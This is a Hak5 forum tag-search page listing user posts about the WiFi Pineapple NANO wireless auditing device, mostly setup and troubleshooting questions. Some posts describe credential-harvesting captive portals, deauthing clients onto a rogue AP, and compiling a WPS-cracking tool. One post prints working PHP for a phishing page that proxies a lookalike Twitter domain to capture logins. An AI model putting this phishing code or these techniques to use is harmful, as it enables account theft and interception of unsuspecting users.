Jump to content

Search the Community

Showing results for tags 'NANO'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I have a portal page and it asks for the client creds After the $_post, the client creds are logged in a txt file, pineapple notified... the client gets kicked, deauthed and hopefully get blocked, hopefully !!! to block the client, I would like to add the $mac to the mac_blacklist in the pineapple.db and for that I would like to know if it is doable. so, how many times or when does the Nano or Tetra reads the pineapple.db ??? at boot, when the client connect or when I open some module Thanks in advance
  2. I know this may be seen as a very pointless and stupid question. Does the Hak5 team provide a set of the icons they use for the various diagrams they publish? E.g https://www.hak5.org/wp-content/uploads/2017/10/openvpn_diagram1.png Although not essential it would be good to be able to produce diagrams while learning, using the same theme as used by Hak5. Must admit I really like the simplistic look of them.
  3. Don't hate me because I'm a Newbie. Whats worse, I don't really know Linux. I was hoping with the Nano I wouldn't need to SSH in. So scary! My question: Is there a resource that provides tutorials and more details on the many cool plug ins now available? I've seen everything I can find on YouTube but many of them are using a Linux command line shell and I am hoping that I can use the GUI on the Nano. There are so many cool things I know can be done with this unit but without knowing more I feel useless and sad :( Please point this geeky enthusiast to any Nano specific "cookbooks", PDFs or Videos you may know of so I may some day not be a Newbie. Thanks folks! Stevels
  4. All, I have a wireless client that will only connect to a specific SSID and MAC address on the 5Ghz band. I configured the SSID into the PineAP pool but the wireless device is not connecting to the SSID I set. I know this because I see the probe request from it in the logs that matches my SSID pool. I can only assume it's because of the MAC address and also perhaps PineAP is not doing this over the 5Ghz band. I set the MAC address it expects in the SOURCE MAC field of PineAP. I presume that since it still isn't working, that this field isn't what I think it's for. Can someone tell me how to configure this to work? Is it possible to change the MAC address of the Nano + PineAP like you would in say, airbase-ng to spoof the MAC address that the client is looking for and to also tell PineAP what band/channel to listen on? NOTE: Yes, this is a sanctioned penetration test and not illegitimate.
  5. N00b question here... Just got my nano and wanted to play around with my own network. But it seems unable to detect any of my network's clients in recon mode. I can see clients on some other networks, but mine comes up blank. Wondering if the pineapple can only detect clients if there are certain conditions. I use a single Google wifi puck for my network's AP. Oddly though, if I profile my network, I can detect client macs. But recon remains ignorant. Thank you
  6. How can I force Evil portal to use portals stored on a SD Card? I’m using the nano and can’t see an option to change storage location from internal to /sd/portals/.
  7. Seb et al, I had my nano working great on my Samsung Note 4. Stopped working with it for maybe a year and during that time, I updated my phone to Samsung Galaxy 8 Edge. I downloaded the (most recent) wifi pineapple app from the Play Store. Followed the directions to connect and I am stuck at "Waiting for connection; Waiting for wifi pineapple to make a connection" USB tethering is on in my settings, I'm using the y cable to attach to power supply (blue light is on), they just aren't shaking hands. What can I do?
  8. OS version is Parrot OS 3.9 (Intruder). Confirmed that ufw is not running. Confirmed that my internet gateway = 192.168.1.1 ┌─[eric@parrot]─[~] └──╼ $ip route | grep default default via 192.168.1.1 dev wlan0 proto static metric 600 Confirmed that internal wifi is wlan0. ┌─[eric@parrot]─[~] └──╼ $ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 54:a0:50:4d:89:57 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 28 bytes 1428 (1.3 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 28 bytes 1428 (1.3 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.116 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::6240:e422:baec:62b7 prefixlen 64 scopeid 0x20<link> ether dc:85:de:bc:ee:64 txqueuelen 1000 (Ethernet) RX packets 91624 bytes 19809556 (18.8 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 14968 bytes 2715717 (2.5 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 Ran [G]uided setup with wp6.sh with confirmation that Pineapple is eth1. ┌─[eric@parrot]─[~] └──╼ $lsusb Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 002: ID 0bda:57b5 Realtek Semiconductor Corp. Bus 001 Device 003: ID 0b95:772a ASIX Electronics Corp. AX88772A Fast Ethernet Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub ┌─[eric@parrot]─[~] └──╼ $ifconfig | grep eth eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 54:a0:50:4d:89:57 txqueuelen 1000 (Ethernet) eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 00:c0:ca:91:bb:b2 txqueuelen 1000 (Ethernet) ether dc:85:de:bc:ee:64 txqueuelen 1000 (Ethernet) Script appears to run successfully with Pineapple found and connected. Saved Settings: Share Internet connection from wlan0 to WiFi Pineapple at eth1 through default gateway 192.168.1.1 [C]onnect using saved settings [G]uided setup (recommended) [M]anual setup [A]dvanced IP settings [Q]uit Detecting WiFi Pineapple......found. _ . ___ \||/ ( _ )_ <--> [___] <--> ,<><>, (_ _(_ ,) \___\ '<><>' Browse to http://172.16.42.1:1471 ┌─[eric@parrot]─[~/pineapple] └──╼ $ Unable to access Internet as demonstrated by failure to load notices in the PineAP system. Error connecting to WiFiPineapple.com. Please check your connection. Anyone notice my failure point?
  9. Hi All, Newbie here 1st time using Wifi Pineapple and Kali linux. So I've been able to successfully follow the setup video and configure my Wifi Pineapple. However, when I tried to Recon, I am getting an error of "There was an error starting up Recon. Please try again." I was only able to Recon once after the initial setup and havent been able to Recon again since then. Not sure what happened. I did enable PineAP's Daemon before noticing Recon doesn't work. Anyone else having this problem? Thanks
  10. Hi All, i have a problem using the pineapple nano attached to the raspberry pi 3. Usually I use team viewer to manage the raspberry, but when I use the wp6.sh and I select the Connect option, the connection from my laptop to the raspberry goes down. I plugged the nano with a powered hub to the raspy, so I think it is not a matter of power, however when I unplug the nano the connection to the raspberry is again available. Can someone help me? Could it be a matter of interfaces taken down? Thanks a lot
  11. I have a new Nano - and have not yet been able to get a client to associate with it. I used Recon mode to whitelist a few of my devices - and changed filter to Allow mode. I also set the active configuration as the default in PineAP (with the daemon running, association enabled, and most of the other features on). Now, I cannot change the filter list. I try clicking on one and remove, doesn't remove it. I tried the drop down under client filtering - that doesn't do anything. I tried disabling PineAP, same results. I also tried to disable the PineAP daemon, uncheck all the options and saved the active configuration as default. After reboots, it still comes up all enabled and running. Any idea how to clear this up without having to do a device reset?
  12. All, The articles I read on here for getting Internet sharing working in Linux did not work for me on Kali Linux 2017.2 using WIFI as your internet connection. This will hopefully help those of you who run into the same problem I had. When using the wp6.sh script and hitting manual setup, it will actually remove your default route that is set in Kali. I'm not sure why it's doing this, despite specifying the default route during the wp6.sh manual setup steps. However, this is a simple fix. Go to the WIFI icon in the top right hand corner of Kali desktop and turn WIFI off. Turn WIFI back on and your default route should get re-added back to your route table. This should get internet sharing working with your Nano. Too lazy to specify the command line for this, you may even try restarting your network-manager service ($ service network-manager restart) but I havent tried this and dont want to :) Good luck! Hopefully this article helps someone.
  13. I'm currently running Ubuntu 16 and was trying to setup the wp6.sh I took the following steps: wget wifipinapple.com/wp6.sh chmod +x wp6.sh sudo ./wp6.sh I get the following error: .wp6.sh 1: ./wp6.sh Syntax error: redirection unexpected I also tried sudo bash wp6.sh Any thoughts or anyone else have this issue? Thanks
  14. HI all. My first post here. I bought a Wifi Pineapple Nano (tactical edition) yesterday. I have not received it yet, but I've got a question about wifi. Since I did not buy the "Elite" edition, since it has been withdrawn from the site, there is no Ralink wifi usb module with the device. This means you have to tether the Pineapple to my phone via Usb or Wifi. But wouldnt it be perfectly possible for the pineapple to connect to a mobile broadband hotspot instead of using my cellular data on my phone? Its a TP-link Mifi device and since I have a simcard with a dataplan of 100Gb pr. month, it would be a perfect match. But is it possible? Thanks in advance - CC
  15. Hello together, i found a way to mount at the newest Firmware a USB-Stick from the Wifi-pineapple Nano I have a SanDisk USB-Stick with 32GB of Memory at the first time i plug the stick in it dosent work but if i do in the coomand line via SSH type his "fdisk -l" i saw the usb stick but i wasnt able to mount it so i was loocking for "dsmesg" an saw at the end was written " 2366.110000] sd 7:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA " i dont really know what that means but i was then loocking in google for "opkg usb driver" and then i found this https://wiki.openwrt.org/doc/howto/usb.essentials so i was just do all stuff just updating it with ignoring errors and after that i was chaneging the fstab file to: config 'global' option anon_swap '0' option anon_mount '0' option auto_swap '1' option auto_mount '1' option delay_root '5' option check_fs '0' config 'mount' option target '/sd' option device '/dev/sdb/' option fstype 'auto' option options 'rw,sync' option enabled '1' and you have to format to ext4 your stick via ssh or on your Webinterface. after that you just need to refresh the page and i saw then a drive "/dev/sdb" and there it is !!! MY USB Stick ! i hope i was helping there some guys. And a really sorry for my bad english :( Greets from Germany Nico!
  16. I have problems with tl-wn725n, I can not see it in ifconfig, I tried installing the driver using opkg but I have the following problem: root@pineapple:~# opkg install kmod-net-rtl8188eu r8188eu-firmware Installing kmod-net-rtl8188eu (3.18.20-1) to root... Downloading http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/kmod-net-rtl8188eu_3.18.20-1_ar71xx.ipk. Multiple packages (kmod-usb-core and kmod-usb-core) providing same name marked HOLD or PREFER. Using latest. Installing r8188eu-firmware (2014-03-16-f8c22c692bdee57a20b092e647464ff6176df3ed-1) to root... Downloading http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/r8188eu-firmware_2014-03-16-f8c22c692bdee57a20b092e647464ff6176df3ed-1_ar71xx.ipk. Package r8188eu-firmware (2014-03-16-f8c22c692bdee57a20b092e647464ff6176df3ed-1) installed in root is up to date. Configuring r8188eu-firmware. Configuring kmod-net-rtl8188eu. modprobe: can't change directory to '': No such file or directory Collected errors: * satisfy_dependencies_for: Cannot satisfy the following dependencies for kmod-net-rtl8188eu: * kernel (= 3.18.20-1-7bed08fa9c06eb8089e82c200340ec66) * * pkg_run_script: package "kmod-net-rtl8188eu" postinst script returned status 1. * opkg_configure: kmod-net-rtl8188eu.postinst returned 1. If the above errors were only about a kernel version missmatch, please ignore them. The package was installed successfully. kernel: Linux pineapple 3.18.36 #40 Fri Oct 28 05:42:22 UTC 2016 mips GNU/Linux lsusb: Bus 001 Device 006: ID 0bda:8179 Realtek Semiconductor Corp.
  17. hello everyone, i just got my wifi pineapple a few weeks ago. i have been trying to troubleshoot it myself but i just cant seem to figure out what is going on with my nano. i set it up correctly and followed the directions like i was supposed to. then when i go to run the guided setup everything goes smooth until it tells me to connect my pineapple to my computer. i connect it but it doesnt seem to recognize it. now i connected it to my laptop and can go to the website with it and its fine but in order for me to connect it to the internet my computer for some reason will not recognize it . if anyone can help me that would be very much appreciated. thank you!
  18. Helle all, I would like to install the latest version of reaver (1.6.1) this version can send an empty pin "NULL_PIN". I have a first error message to compile and I do not know how to install gcc, can you help me ? Git: https://github.com/t6x/reaver-wps-fork-t6x 0day with reaver 1.6.1: http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure -ash: ./configure: Permission denied root@Pineapple:~/reaver-wps-fork-t6x-master/src# chmod +x configure root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure checking for gcc... no checking for cc... no checking for cl.exe... no configure: error: in `/root/reaver-wps-fork-t6x-master/src': configure: error: no acceptable C compiler found in $PATH See `config.log' for more details root@Pineapple:~/reaver-wps-fork-t6x-master/src# Thank you Br, Netask
  19. So I received my Wifi Pineapple NANO a few days ago and it worked fine on first try, I got on to the web interface and reached the point of updating the firmware and I think I may have messed up. Now whenever I plug the nano in, the light flashes twice holds for about 5 seconds then turns off, I can't ssh to it, I can't get the web interface and I can't see it as a wifi network. Any advice?
  20. Hi there i'm New to Wifi Pineapple Nano ! My System: MacBook 13" Retina pro ( Mid 2015 ) Kali Linux Full Install on SanDisk Extreme 3.0 64GB my Problem Is that i cannot Load the Bulletin After Install Firmware Upgrade 1.0.6 does someone have a idea how to Solve this Problem ? Which Commands can i Check to See if anything Works? Thanks so much for your help!!! cheers Florian
  21. So the other week I posted TWO threads about my Pineapple Nano and Tetra. I have not recieved much information on the posts from anyone. I am just wondering why nobody is able to give me an answer for the fact neither of my devices are capturing clients? I have watched the YouTube vid by Hak5 on "Going from prime to primeap" - Where he shows you adding the MACs to the Pool, also adding the SSID to the pool, enabling deamon and every check box, and then deauthing everyone off the network... The deauth DOES NOT WORK. And I am not receiving ANY clients?
  22. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  23. Hey folks, i searched the Forum, but found nothing really helpful to my issue, so I decided to start my own thread. Recieved my NANO yesterday and most of the things work fine. Just the client mode wont work with the delivered wifi dongle. It doesnt show up my router or my hotspot from android tablet if i scan with wlan2. Even if the nano lies in front of it. Tried it with a TP-Link and it works fine. But i really dont want to stick that white bulky thing into the pineapple while its in the elite bag. Hows that looking? Actual setup: Factory resetted NANO with elite antennas. OS 1.1.3 installed. only module installed is DWall The included wifi dongle is plugged in. I scan with wlan1 and find all the APs sorrounding me.But I want to use the PineAP, so I scan with wlan2. Most of the time it finds no single AP. Any ideas how to fix this?
  24. So i have set my Nano up. I have updated to the lastest firmware. I have gone into recon mode and clicked scan over 15 seconds. I have picked up my router that all my devices are connected to in the house. I went down the list of associated devices and added them to the filters. I also turned filters to allow... I went into the PineAP and ticked all the boxes. I then went back to the recon page and Deauthed my router... But it is not connecting any devices? How come this is? I am still browing the web on my phone (i tried both on the windows and connected to an android and both times no associated clients) I am however sending out a spoofed AP named Open Wifi... But that is not my goal? My goal is the make every device connected to my router, actually connect to my pineapple and then into my wifi? But no devices are being captured? P.S. Will the nano also pick up mobile phone devices? I have had some problems in the passed with MITM techniques not actually picking up mobile phones (pref new ones like the s7 edge and the iphone 7)
  25. I just bought a Pineapple Nano Tactical Elite. I don't understand how to wirelessly connect to an AP with the included USB WiFi thingy. I understand how to interface with it though. If somebody could tell me where I can instruct the Pineapple to use the third-party radio, that'd be great. Also, has anybody had trouble with their pineapple? My web interface tends to freeze after a few minutes on proper power (I've tried to factory reset a few times), it can only be temporarily fixed when I restart the Pineapple (and ssh works when it's frozen, weird huh?). Anyway, thanks for everyone's help in advance. -Matt London
×
×
  • Create New...